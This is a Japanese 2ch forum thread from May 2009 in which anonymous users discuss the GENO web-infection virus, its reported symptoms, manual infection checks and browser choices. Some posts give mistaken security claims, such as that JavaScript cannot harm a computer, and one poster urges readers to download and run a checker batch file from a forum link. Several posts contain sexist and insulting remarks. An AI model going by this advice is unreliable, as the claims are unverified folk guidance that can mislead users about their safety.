プログラムの追加と削除
253 スズナ(広島県):2009/05/17(日) 20:43:34.01 ID:N53/NzDO
>>243
良かった、流石にそりゃねーよ会員に訴えられるぞって思ったわ
254 スカシタゴボウ(神奈川県):2009/05/17(日) 20:44:37.07 ID:gp7HbkgM
ノートン2009のLiveアップデートすると、デバイスマネージャーで表示されるネットワークアダプタの末尾に
Symantec Network Security Miniportっていうのが!マーク付きで表示されて
ネットができなくなるんだけど。
調べたら対応策なしとか書いてあってオワタ。
アップデートできないとか俺死ぬの?GENOウイルス感染待ちなの?
255 カタクリ(千葉県):2009/05/17(日) 20:45:19.81 ID:KLsPwtoF
256 シラネアオイ(コネチカット州):2009/05/17(日) 20:45:33.98 ID:zKxuAo6l
>>249
ようつべとか見ないの?
257 ニオイタチツボスミレ(dion軍):2009/05/17(日) 20:45:52.90 ID:8ngG70Du
>>251
そもそも一般ユーザーは気付いていない
知らないで再起動>ブルスク

気付いた者が生き残れる
258 タチツボスミレ(静岡県):2009/05/17(日) 20:46:07.14 ID:OUWbXyvU
>>252
ありがとう
なんかAdobeFlashPlayer10ActiveXってのがはいtってこわすぎ
259 アネモネ・ブランダ(福島県):2009/05/17(日) 20:46:15.83 ID:7y9yZ8YO
adobereader入れてないから安心だ
260 モリシマアカシア(埼玉県):2009/05/17(日) 20:46:29.72 ID:lYqC6EsV
昔、FLASHの関連付けを切って元に戻せなくなったw
アホだなぁ、俺
261 プリムラ・インボルクラータ(東京都):2009/05/17(日) 20:46:43.81 ID:K7aK26c4
http://takeshima.2ch.net/test/read.cgi/news4vip/1242547793/l50
vipperは相変わらずアホぞろいだな
262 藤(山梨県):2009/05/17(日) 20:46:47.80 ID:Ave0Vl0J
>>199
> 一応シャットダウンの不具合も書いておいた方がいいんじゃ?
> 後ライセンスキーの事も

kwsk
263 カタクリ(千葉県):2009/05/17(日) 20:47:08.57 ID:KLsPwtoF
>>258
それがIE版
264 ハナムグラ(奈良県):2009/05/17(日) 20:47:31.92 ID:QmmxGA7V
>>257
サイトにアクセスするだけだからウィルスって事にすら気づかないだろうしな
正に情弱涙目
265 スイカズラ(北海道):2009/05/17(日) 20:47:39.34 ID:4JancLQY
糞だ。
重い重い。
そう言われても信じてNoScript入れてた俺の大勝利
266 スズナ(東京都):2009/05/17(日) 20:47:40.92 ID:VZD8/13g
>>248
消せないの?
267 チドリソウ(関東):2009/05/17(日) 20:48:22.82 ID:DyBbXwC5
なんだノートンも対応してるし、ゼロックスフォルダも心配いらないみたいね
268 キンギョソウ(長屋):2009/05/17(日) 20:48:46.52 ID:SHbVMyjf
Flashの最新は10.0.22.87
269 キショウブ(滋賀県):2009/05/17(日) 20:49:04.43 ID:RN0a72q8
sqlsodbc.chmの更新日が一年前だしcmd、regedit共に起動するから
感染してないはずだけど怖くて再起動できない
誰か俺を安心させてν速のみんな
270 モリシマアカシア(関西地方):2009/05/17(日) 20:49:48.89 ID:+MGVg9A6
>>265
何も苦労せずにスクリプトだけじゃなくてflashも自由自在に切り替えられるOpera民は大大大大
271 スカシタゴボウ(神奈川県):2009/05/17(日) 20:49:51.02 ID:gp7HbkgM
月曜日からが地獄だな。
出社してきたサイト管理者が迂闊にGENOウイルスサイト踏んで感染したら、大変なことになる。
きっとニュースで迂闊な月曜日とか言われて、大騒ぎになるぜ。
272 キバナノアマナ(東京都):2009/05/17(日) 20:50:52.61 ID:Yz7qR1Rh
ttp://zerohaziblog.blog4.fc2.com/blog-date-20090514.html
普通にこういうのがいるから
273 オウバイ(神奈川県):2009/05/17(日) 20:50:54.87 ID:CMCRgCxl
>>258
つか、アド( ゚д゚)、ペッぐらいお気に入りに入れとけ。
274 ハナビシソウ(愛知県):2009/05/17(日) 20:51:10.58 ID:Qj6zykip
よくわからん
俺感染してないしなんかウソくせー
275 トリアシスミレ(アラバマ州):2009/05/17(日) 20:52:20.46 ID:WkUhbFeV
確かにadobeにも責任はあるかもな。
276 オウレン(山口県):2009/05/17(日) 20:52:31.29 ID:TbUW2CvG
>>258は前スレ見てなくてよかったな
277 カラスビシャク(埼玉県):2009/05/17(日) 20:52:48.27 ID:4sYNvOMI
>>265
つい最近はマルウェア的な動作があって叩きに叩かれたもんだがな

>>270
Flashもjsで動かしてるのにアホだなおまえ
278 マンサク(関西地方):2009/05/17(日) 20:52:48.89 ID:oh5qyHAN
>>274
こういうウィルスは君みたいな真偽確かめれない情弱から感染していくんだぜ
279 クマガイソウ(三重県):2009/05/17(日) 20:54:18.85 ID:CA52I+eF
>>274
壮大な釣りだから気にしなくていいよ
280 キクバクワガタ(広島県):2009/05/17(日) 20:54:43.01 ID:81YzY69Q
同人ってキモオタのサイトだろ?wどうでもいいわ
281 オランダミミナグサ(長屋):2009/05/17(日) 20:54:54.99 ID:JmDW7GMT
>>269とりあえず最悪の事考えて残したいで゛ー他は退避させてから再起動
282 マンネングサ(埼玉県):2009/05/17(日) 20:55:20.78 ID:bdMTxhpe
>>59
不吉なこと言うんじゃねえ!
283 アズマギク(滋賀県):2009/05/17(日) 20:56:10.52 ID:+nbbjxd2
これ感染してたら再起動かけた時に発動すんの?
まとめ見られないんだが
284 ハクモクレン(大阪府):2009/05/17(日) 20:56:26.86 ID:gRfr6Ape
アクロバット入れてなけりゃOKなんじゃないの?
285 福寿草(埼玉県):2009/05/17(日) 20:56:27.96 ID:2qxZUYZb
で、チミたちVista買うの?
7が出るまでインターネット辞めるの?
286 ヤエザクラ(東京都):2009/05/17(日) 20:56:40.77 ID:wVHhXxdG
未だに感染していないオイラは運が良かっただけなのか?
とりあえず、まとめのウィルス確認して全部セーフだった
ニコニコとか動画サイトいくつか見ちゃったけど、これからは用心だな
287 マツバウンラン(アラバマ州):2009/05/17(日) 20:57:03.35 ID:dG7Gm8XN
ふたばとにちゃんしか開かない俺に死角はなかった
288 オウバイ(神奈川県):2009/05/17(日) 20:57:10.74 ID:CMCRgCxl
>>269
新しいPCとOSを買えばいい。
これで解決。
289 プリムラ・インボルクラータ(東京都):2009/05/17(日) 20:57:45.39 ID:/eSNuI8m
「pdfはブラクラ」ってのはほんとのことだったのだなあ
290 スズナ(滋賀県):2009/05/17(日) 20:58:04.02 ID:QKFBMuEO
>>285
対策してXPで7待ち
291 カラスビシャク(埼玉県):2009/05/17(日) 20:58:20.90 ID:4sYNvOMI
同人板マジおもしれえ
292 マンネングサ(埼玉県):2009/05/17(日) 20:58:32.22 ID:bdMTxhpe
ノートン先生対応きた?
293 ガザニア(大阪府):2009/05/17(日) 20:58:46.78 ID:MWvflWFs
今更Vistaなんて買うわけがねえ
294 ハンショウヅル(関西・北陸):2009/05/17(日) 20:59:09.42 ID:sFHwsOG2
キモヲタのネット内での行動力は異常
295 オウバイ(神奈川県):2009/05/17(日) 20:59:36.28 ID:CMCRgCxl
>>285
ケーブルTVとADSLの2回線で2系統の環境構築しているから
問題ないね。流出しても平気w
7まで待つよ。
296 フデリンドウ(アラバマ州):2009/05/17(日) 20:59:49.79 ID:5GYYwEGs
>>254
【ノートン】Norton Internet Security Ver.165【2009】
http://pc11.2ch.net/test/read.cgi/sec/1242559778/
297 ツゲ(神奈川県):2009/05/17(日) 21:00:18.81 ID:p9HfH9Vd
母艦でやらずにクリーンインストールした骨董サブノートでしばらく生きるわ
298 バラ(岩手県):2009/05/17(日) 21:01:04.00 ID:1HlFXFRg
2chが感染したら2chブラウザでもあうあう?
299 イヌノフグリ(秋田県):2009/05/17(日) 21:02:22.91 ID:ATO6mXtL
幸いにもウイルス無かったが、しばらくエロサイトめぐりは自粛だなあ・・・・
300 クロッカス(宮城県):2009/05/17(日) 21:02:44.11 ID:9ygFiUHe
有志が作って下さった
感染チェックツール
http://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認
301 ムラサキハナナ(大阪府):2009/05/17(日) 21:02:57.05 ID:vWb4YxuA
とりあえず最新版にしてりゃ感染サイト見ても大丈夫なんだろ?
馬鹿馬鹿しいからもうネットサーフィン再開するわ
貴重な休日潰れたわ
302 フデリンドウ(アラバマ州):2009/05/17(日) 21:03:35.59 ID:5GYYwEGs
>>237
2000はGENOウイルスに感染しないのでは?
違うのですか?
303 タチツボスミレ(静岡県):2009/05/17(日) 21:04:04.12 ID:OUWbXyvU
>>300
なにそれこわい
304 タネツケバナ(東京都):2009/05/17(日) 21:06:57.05 ID:u9sCl3Li
Avast Professionalユーザの俺様大勝利だな
305 オニタビラコ(静岡県):2009/05/17(日) 21:07:24.74 ID:jNe7f5fc
>>301
XPなんか使ってるから丸1日無駄にする
時間は貴重だろ?
306 桜(福岡県):2009/05/17(日) 21:08:46.67 ID:aKpz6ARH BE:371769942-2BP(2)

carwash踏んでから再起動したけどなんもなかった
307 サイネリア(福岡県):2009/05/17(日) 21:08:54.17 ID:dkLC4kn7
とりあえず家計簿にしかつかってなかったvistaノートを使うことにするか…。
308 シャクナゲ(dion軍):2009/05/17(日) 21:09:18.51 ID:2S78G9Tr
バスターさん、IE8対応してないってマジかよ
家族のPCのブラウザIE8にしちゃったよ…
自分は火狐だけど
どうしようかね
309 ビオラ(兵庫県):2009/05/17(日) 21:09:57.70 ID:kGRZ+d45
正直インフルエンザのウィルスより怖いわ(神戸在住)
310 イワウチワ(鳥取県):2009/05/17(日) 21:09:58.32 ID:avsNBbVp
会社のPCでしばらくネットサーフィン禁止にしたほうがいいかな
昼休憩とかも
311 キンケイギク(千葉県):2009/05/17(日) 21:09:58.27 ID:o01Paw4J
vista厨ウゼーよ
無駄に煽んなボケ
312 クロッカス(宮城県):2009/05/17(日) 21:11:04.23 ID:9ygFiUHe
>>303
ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。

心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。
313 キブシ(福岡県):2009/05/17(日) 21:11:12.98 ID:jz82hR6L
涙目すなぁ^^
314 オオイヌノフグリ(ネブラスカ州):2009/05/17(日) 21:11:57.74 ID:Ucr7r1sY
事故解決

・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・FTPに接続するとパスワードを収集され新たな攻撃の踏み台にされる
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/
315 オオタチツボスミレ(福岡県):2009/05/17(日) 21:14:52.49 ID:IaeRH/Ob
PC上級者の俺でも分からないのが
「ウイルスが進化した」っていうけど、
これは伝染していく間に勝手に「進化」するのではなくて
誰かが故意に「進化」させたっていうことで桶?
316 ホトケノザ(長崎県):2009/05/17(日) 21:15:31.66 ID:Tr4vzbvG
おkでしたwww

【感染の確認方法】

@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したらAへ

Asqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
317 ショウジョウバカマ(コネチカット州):2009/05/17(日) 21:15:38.49 ID:ooPy6cmt
てかっ、
電源オフや再起動したらアカンのかよOrz

今日は徹夜かよ


318 ウバメガシ(アラバマ州):2009/05/17(日) 21:16:13.94 ID:5RBrpUPt
VISTAだけど邪魔だからUACなんて切ってたぞ糞が
319 フクシア(神奈川県):2009/05/17(日) 21:16:57.37 ID:cZ85gIrd
一ヶ月くらい起動してないサブPCを更新のために起動するべきか脅威が去るまで放置するべきかうーん
320 キュウリグサ(神奈川県):2009/05/17(日) 21:17:02.82 ID:7I7g4Il2
>>266
今のところ消す方法は無い。
hostsをいじって収集サイトへのアクセスを遮断する方法はあるけど、収集サイトがいつ変わるかわからんから気休め。
321 ニオイタチツボスミレ(catv?):2009/05/17(日) 21:17:41.46 ID:k4QBxYLX
気をつけていても安全そうな所でもウイルスに感染している可能性があって、
しかも検出不可なので感染したのにも分からず、
感染したのが気がついたら時既に遅しでもはや再インストールしか道が無いとは。
はんぱねーな。
322 菜の花(宮城県):2009/05/17(日) 21:17:53.34 ID:FYSoDu6x
>>315
そうね
変異はウィルス自身の機能として持たせることも出来るが
323 福寿草(埼玉県):2009/05/17(日) 21:17:59.67 ID:2qxZUYZb
>>318
今から入れればいいじゃない。
あと厨ソフトでUAC時の画面暗転切るのも御法度な。
324 レウイシア(大阪府):2009/05/17(日) 21:18:23.24 ID:BGymQwQM
>>315
うん
325 タチツボスミレ(静岡県):2009/05/17(日) 21:19:11.34 ID:OUWbXyvU
胃が痛くなってきた
326 ミヤマヨメナ(アラバマ州):2009/05/17(日) 21:19:19.55 ID:CR84eHIv
vistaから7に無償で移行できるってスレ見てちょっとvista入れようかとも思ったけど、
あれって既存のユーザーが対象になるのか分からないんだよね?
327 ミミナグサ(愛知県):2009/05/17(日) 21:19:28.90 ID:Qtky1iiK
sqlsodbc.chmの容量がメインも仮想PCも半年くらいネットつなげてないのも50,727バイトじゃないんだけどどうなってるんだ
>>300のチェッカーでは大丈夫だって出てるけど
328 オウレン(埼玉県):2009/05/17(日) 21:20:18.29 ID:3UODKY+n
>>315
糞ワロタ
329 モリシマアカシア(埼玉県):2009/05/17(日) 21:20:52.13 ID:lYqC6EsV
とりあえず寝るわ
寝たら治るだろ
330 ニオイタチツボスミレ(catv?):2009/05/17(日) 21:21:14.62 ID:k4QBxYLX
>>326
多分プリンストールモデルはスルーかも。
でも割安でメーカーがアップグレードプログラム用意してくれるかもね。
メーカー次第だけど。
331 ユキノシタ(dion軍):2009/05/17(日) 21:22:01.83 ID:yYveNWCW
>>327
OS晒せ
332 クロッカス(宮城県):2009/05/17(日) 21:22:23.47 ID:9ygFiUHe
>>300の感染確認batファイルをデスクトップにでも置いておけば
いつでも簡単に確認できるから落としておくことを強く勧めます。
333 チドリソウ(関東):2009/05/17(日) 21:23:18.48 ID:t0SzZMWL
キンタマウイルスとは方向性が違うが、潜伏っぷりと対処法が嫌過ぎる
誰だよ作った奴
334 オキザリス(東京都):2009/05/17(日) 21:23:45.79 ID:OT2LLMTM
>>264
へたにサイトを運営していたり、自宅に仕事を持って変えたっりしていて
FTPでファイル更新をして、そしてそのサイトもウイルス配布サイトに。

これは暫く止まりそうもないな。
335 ミミナグサ(愛知県):2009/05/17(日) 21:25:53.73 ID:Qtky1iiK
>>331
XP ホームエディション
336 ムラサキハナナ(大阪府):2009/05/17(日) 21:26:49.36 ID:vWb4YxuA
知らない奴だけが問題なんだろ
ここで騒いでてやるだけやった奴はもう安心だろ
337 マツバウンラン(岡山県):2009/05/17(日) 21:27:13.15 ID:kRX/rFYX
>>335
ご冥福お祈りします
338 センダイハギ(アラバマ州):2009/05/17(日) 21:27:23.57 ID:OyHCHJOU
今Vistaのパソコン買っても2年ぐらいでもうサポート期間終わっちゃうんだろ?
ひどすぎ
買えねーじゃん
339 オウレン(埼玉県):2009/05/17(日) 21:27:28.16 ID:3UODKY+n
同人板糞ワロタ

881 GENO[sage] 2009/05/17(日) 21:25:49 ID:oUobyklU0 [New]
火狐が扱いにくそうだと感じたらOperaでもおk
IEコンポーネントだっけ?をつかってるからサイト見るときもIEで見るのと変わらないらしいよ
あとこのスレ的にはOperaのほうがお勧めみたい
340 レブンコザクラ(catv?):2009/05/17(日) 21:28:01.95 ID:s6kVU3Rg
>>333
つーか、これでキンタマみたいな症状だったらって考えただけでも恐ろしいよな
341 カンパニュラ・サキシフラガ(埼玉県):2009/05/17(日) 21:28:22.97 ID:saUMC/hb
この際プニル厨は火狐にしとけ

> 631 名前:名無しさん@お腹いっぱい。 sage New! ▽1件 投稿日:2009/05/16
(土) 23:47:24 0回目
> >>501>>514>>518
> Sleipnir → Firefox3 移行推進計画
> ttp://ktrue.blog.shinobi.jp/Entry/387/
>
> ここに書かれてるの片っ端から入れたら楽に乗り換えられた
> 今じゃアドオン探しに夢中だわ

そしたら次はこれな

> Firefoxのリンク先読み機能"network.prefetch-next"を無効にする方法
> ttp://d.hatena.ne.jp/EijiYoshida/20070919/1190194409

最後はpdf踏んだら処理方法を聞いてくるようにする拡張

> PDF Download 2.2.0.0
> ttps://addons.mozilla.org/en-US/firefox/addon/636
342 サイネリア(関東・甲信越):2009/05/17(日) 21:28:25.92 ID:NrIozNFe
アドベをアンインストールしたら感染サイトに突っ込んでも平気なんだろ?
343 ヤブヘビイチゴ(大阪府):2009/05/17(日) 21:28:27.94 ID:Ht5N3vxT
>>335
うわぁ・・・・
344 ヒマラヤユキノシタ(山陰地方):2009/05/17(日) 21:28:40.46 ID:72kAzcv0
http://tsushima.2ch.net/test/read.cgi/news/1242534578/

このスレの動画超見たいんだけど
youtubeは感染してないよね?ね?
java入れちゃってもいいよね?ね?
345 モリシマアカシア(関西地方):2009/05/17(日) 21:29:15.15 ID:+MGVg9A6
この際プニル厨と火狐ねとらん厨はOperaにしとけ
346 カンガルーポー(東日本):2009/05/17(日) 21:29:39.48 ID:2tzVhWwD
>>344
いいから早く寝ろ
347 スズナ(埼玉県):2009/05/17(日) 21:30:18.12 ID:4QuIVfhI
>>344
youtubeのリンク
危険度7%
安全なURLです。踏んでも大丈夫でしょう。
評価ミス報告
348 スズナ(福岡県):2009/05/17(日) 21:30:31.92 ID:bFUaOspa
IE8だとどこ行っても感染しないっぽいな
IE7以下でもjscript.dllを差し替えるだけでも回避できそうに思えるがどうなんだろう
349 シデコブシ(関東・甲信越):2009/05/17(日) 21:30:36.11 ID:kFidMo1H
>>309
逆じゃね?(笑)
弱毒性のインフルエンザウイルスより、
ある意味GENOのが怖いだろ(笑)
350 タチツボスミレ(静岡県):2009/05/17(日) 21:30:37.25 ID:OUWbXyvU
JaneDeoStyleでこのスレ見てる奴
感染してるぞ
351 タネツケバナ(東京都):2009/05/17(日) 21:31:26.97 ID:u9sCl3Li
>>334
仕事のデータFTPでやりとりするアホは死ぬべき
352 マンネングサ(埼玉県):2009/05/17(日) 21:31:32.90 ID:bdMTxhpe
症状的には、キモオタにとっちゃキンタマの方が嫌じゃないか?
性癖等のハイド氏を不特定多数に公開されるわけだから。
GENOは晒し系じゃないだけマシ。

あと似非キンタマなんかは感知されない場合が多いから、
潜伏っぷりに関しても嫌らしいと思う。
353 モリシマアカシア(関西地方):2009/05/17(日) 21:31:57.85 ID:+MGVg9A6
>>277
あ?

flashだけ無効にできるの
そんでjavascriptは本来全くコンピューターに損害与えようがない拡張だから、安心してjavascript付きのWeb巡回ができる

flashを防ぎたいがために便利なjavascriptを犠牲にしなくてはならない火狐はカス、プニルは論外
354 モリシマアカシア(関西地方):2009/05/17(日) 21:32:22.75 ID:+MGVg9A6
∴Opera最強定理は示された
355 ミヤマヨメナ(アラバマ州):2009/05/17(日) 21:33:16.60 ID:CR84eHIv
>>330
しばらく様子見ます
サンクス
356 藤(dion軍):2009/05/17(日) 21:33:21.56 ID:ZOQp7hVf
うぃきは大丈夫なの?
vistaでのチェック方法は?
357 ムラサキハナナ(長屋):2009/05/17(日) 21:33:53.64 ID:XFZQSlQq
現時点だとVISTAが鉄壁の防御力を誇っているな。
※UACをONにしている場合に限る
358 エピデントルム(ネブラスカ州):2009/05/17(日) 21:33:54.10 ID:YumDNafD
VistaだけどAdobeのFLASHとReaderをダウンロードしかしてないんだが他に特になにもしなくてよさげ?
PCの知識皆無だからよくわからん、再起動は普通に出来たから感染はしてないと思うが・・・
359 オキザリス(東京都):2009/05/17(日) 21:34:21.15 ID:OT2LLMTM
>>351
そんなサーバの使い方をしている企業が、まだまだ沢山ある。
SFTPって何?とか言って、サーバは未だにRH7とか。

2002年から一切更新されてないSmabaも動いてるWEBサーバとか
IP認証をかけずにTELNET許可してるサーバなんてのも、数え切れないよ。
360 ハナビシソウ(愛知県):2009/05/17(日) 21:34:22.36 ID:Qj6zykip
>>344
大丈夫だよ
俺そこ見てたし
361 タマザキサクラソウ(栃木県):2009/05/17(日) 21:34:55.21 ID:kmiyNyNB
sqlsodbcの容量が46kbしかなくてチェックツールに怒られたけど、
そもそも英語版ヘルプだから問題じゃないだろうな。
362 クロッカス(宮城県):2009/05/17(日) 21:35:54.80 ID:9ygFiUHe
>>356
有志が作って下さった
感染チェックツール
http://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認

ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。

チェック後の起動画面。
http://www.rupan.net/uploader/download/1242563513.png
363 マンネングサ(埼玉県):2009/05/17(日) 21:35:55.75 ID:bdMTxhpe
>>353
flash無効化ってどうやるん? “アニメーションを有効にする”のチェックを外せばいいの?
364 ミミナグサ(愛知県):2009/05/17(日) 21:38:27.88 ID:Qtky1iiK
この煽り方だと大丈夫みたいだな
365 ガーベラ(千葉県):2009/05/17(日) 21:38:31.40 ID:8ilnV8zY
ウイルス?なにそれ?怖い!って腐女子が大騒ぎしてるだけだろ
実際感染しても最悪ブルーバックくらいだし
対策も容易。そこまで騒ぐ意味が分からん
366 タネツケバナ(東京都):2009/05/17(日) 21:38:48.94 ID:u9sCl3Li
>>359
RH7の頃でさえ標準でtelnet無効かつSSH動いてなかったかw
まあ、90年代の運用やってるところは滅びればいいよ
367 水芭蕉(アラバマ州):2009/05/17(日) 21:40:14.88 ID:963+B9KC
3,4日前までいっぱいあったXP厨の
「VistaでもこのVirusには安全じゃない、XP最高ぅうううう」な論調が全くなくなったのが笑える
368 スズナ(福井県):2009/05/17(日) 21:40:41.08 ID:aThEtNN3
しばらく2ch以外のネットはPS3で見るかw
369 クロッカス(群馬県):2009/05/17(日) 21:41:24.45 ID:xQoWzUmZ
今回の件に限らず不具合とか検出率の面ではバスターとノートンどっちがおすすめ?
370 ハナモモ(dion軍):2009/05/17(日) 21:41:26.00 ID:mgZmQ4OM
もっててよかったPS3
371 藤(dion軍):2009/05/17(日) 21:41:35.82 ID:ZOQp7hVf
>>362
ありがとう
感染してたらどうなるんですか?
感染してたら右側の規定がでてこなかったりしますか?

ちなみにvistaでUACは外してないみたいです
372 カンパニュラ・サキシフラガ(埼玉県):2009/05/17(日) 21:41:57.29 ID:saUMC/hb
>>353
火狐でもAdblockで*.swfと指定すりゃflash弾くことできるんだが
373 ローダンゼ(東京都):2009/05/17(日) 21:42:03.85 ID:suw+sYFj
にフ騒ぎと良いヌ即も同人とどっこいじゃねえ?w
ここ見てると同レベル
374 ロベリア(山口県):2009/05/17(日) 21:42:43.48 ID:TPmQ3NS3
Flash無効にすれば大丈夫なの?
一応火狐にFlashblockっていうアドオンあるからこれ入れたら無効化できるけど
375 キュウリグサ(神奈川県):2009/05/17(日) 21:43:05.52 ID:7I7g4Il2
>>365
情報抜かれるのが困るんだよ
クレカの番号とかネットバンキングのパスワードとか
376 ムラサキケマン(東日本):2009/05/17(日) 21:43:09.78 ID:8saPFtNI
K's電気でPCを購入しました。
HDDが壊れた時用+別PC用にOSのCDをくれと何度も言ったのですが
HDDに入っているからそれをコピーすれば良いと言われ突き放されました。
OSの抽出の方法がわからず、今回、HDDを新規購入のデスクトップ(OSなし)に移そうと考え、色々検索してみたのですが
HDDをイメージ化するソフトとHDDをUSB接続するハードとケーブルを別途購入しなければならないのでしょうか?
377 スズナ(富山県):2009/05/17(日) 21:44:44.30 ID:XPSr7GqC
>>376
どこのコピペだよ
378 水芭蕉(アラバマ州):2009/05/17(日) 21:44:45.05 ID:963+B9KC
>>376
IDの出ないセキュ板で遊んで来い
379 クロッカス(宮城県):2009/05/17(日) 21:45:41.98 ID:9ygFiUHe
>>371
こんなメッセージがでます。

GENOウィルスに感染している恐れがあります。
直ちにこの端末をスタンドアロンにして、
必要なファイルをバックアップ、ウィルスの駆除またはOSのリカバリを推奨します。
380 ボケ(コネチカット州):2009/05/17(日) 21:48:52.83 ID:Ed9fthUF
俺が初期に感染したときは再起動しても問題なかったぞ
cmdが勝手に動いてたから異常なのはすぐわかったけど
381 フデリンドウ(アラバマ州):2009/05/17(日) 21:49:47.98 ID:5GYYwEGs
>>380
ウイルスは進化するから。
382 ショウジョウバカマ(catv?):2009/05/17(日) 21:50:32.98 ID:KsTlzNMq
>>311
XP厨くやしいのうwくやしいのうw
383 ユリオプスデージー(北海道):2009/05/17(日) 21:50:43.83 ID:pcT6KiTg
何でこんなに盛り下がってんだよ
384 藤(dion軍):2009/05/17(日) 21:52:02.45 ID:ZOQp7hVf
>>379
ありがとうございます。
無事だったんで一安心
385 ハチジョウキブシ(神奈川県):2009/05/17(日) 21:52:43.57 ID:CB7DjU1U
>>383
他所で釣りでもしてるんじゃね?
386 プリムラ・ヒルスタ(埼玉県):2009/05/17(日) 21:52:44.84 ID:W7zECwLz
>>383
引きこもりになったから
387 ガーベラ(千葉県):2009/05/17(日) 21:53:03.20 ID:8ilnV8zY
>>375
今までのウイルスもそんなもんだろ
適当に同人サイト見てみたら今回のウイルスについて間違った知識てんこ盛りで
えらそうに対策打ってた奴もいてワロタ
女はネットやるな
388 シンフィアンドラ・ザンゼグラ(中部地方):2009/05/17(日) 21:53:07.09 ID:x8g0MadN
エロ収集はP2Pでするか
389 藤(神奈川県):2009/05/17(日) 21:53:18.05 ID:j/TqFG/D
>>383
ウイルス作者が低スキルみたいだからなあ。
くだらんわ。
390 オオタチツボスミレ(福岡県):2009/05/17(日) 21:54:33.63 ID:IaeRH/Ob
>>338
完成されたOSということだよ
391 ロウバイ(岩手県):2009/05/17(日) 21:54:50.81 ID:HsmjOfzR
>>358
基本的にはおk
392 パンジー(福岡県):2009/05/17(日) 21:56:41.85 ID:B4cic04o
Adobe Acrobat ReaderとAdobe Flash Playerを
最新にしたらある程度のリスクは回避でOKなのか?
393 スズナ(関東・甲信越):2009/05/17(日) 21:57:59.10 ID:benJl3kK
しゃあないとりあえずPCはパンドラとコソアンだけにしとくか
394 ローダンゼ(福岡県):2009/05/17(日) 21:58:04.89 ID:+5MOTdjQ
このサイトは大丈夫でしょうか?
http://www.takamagahara.com/printin/
395 タチツボスミレ(静岡県):2009/05/17(日) 21:59:11.06 ID:OUWbXyvU
うかつにオナニーも出来ないね
396 マンサク(香川県):2009/05/17(日) 21:59:27.22 ID:mj+8N9rl
今回のウイルスはAdobeの脆弱性を狙ったものだから
Flash PlayerとReaderを公開された修正版にアップデートすれば話は終わるんだが
それすらわからない人達がいっぱいいるから盛り上がっているわけです
397 ロウバイ(福岡県):2009/05/17(日) 22:00:03.16 ID:IgdWAzg2
flash最新版にしてるのに
youtube他サイトでflash最新版を求められる
なぜ?!
398 プリムラ・ビオラケア(福島県):2009/05/17(日) 22:00:28.33 ID:s5ZNU51Z
>>394
すごく懐かしいと思っただけ
399 キブシ(東京都):2009/05/17(日) 22:01:10.53 ID:lkGVu3aj
>>396
せいかいれす(^q^)
400 ハボタン(catv?):2009/05/17(日) 22:01:23.81 ID:b03N1eMT
>>363
コンテンツ > プラグインを有効にする のチェックをはずす
401 シロイヌナズナ(アラビア):2009/05/17(日) 22:02:07.30 ID:nMIkKb4Z
私はいくつか日本の友達を探したくて、日本語を学んで、私もあ
なた達の中国語を教えることができて、みんなが私と友達をすることができることを望んで、私は今中学生です
付き合う中国のBlogger:monkey.d.lin.blog.163.com
QQ:395458789日
本のBlogger: http://blog.livedoor.jp/lyz395458789【Blogge
rが今日ちょうどいじったのです、その上私が日本語が見て分かりません、だから少し単調です】
402 シンフィアンドラ・ワンネリ(空):2009/05/17(日) 22:02:15.11 ID:Mxxf0mNV
なんかもっと未曾有の恐怖が蔓延すると思ったけど、
そんな感じじゃないな。
403 スズナ(富山県):2009/05/17(日) 22:02:53.92 ID:T6TELgPe
>394
GENOウイルスチェッカー
危険度2%
安全なURLです。踏んでも大丈夫でしょう。
404 パンジー(福岡県):2009/05/17(日) 22:03:09.03 ID:B4cic04o
>>396
へーなるへそー
まぁ警戒に越した事は無いが心の荷が軽くなったぜ

そしたらそれ以外の弱点を突いて来るウイルスが
出て来るかもなんですね…(そうなったらもはや新種だが
405 プリムラ・ビオラケア(関西地方):2009/05/17(日) 22:04:15.00 ID:CGz5lqbx
vista厨って
ロクな知識もない低知能がノコノコとPC買いに行って店員の言いなりになってムザムザとvistaインスコモデルを買わされたんでしょ?
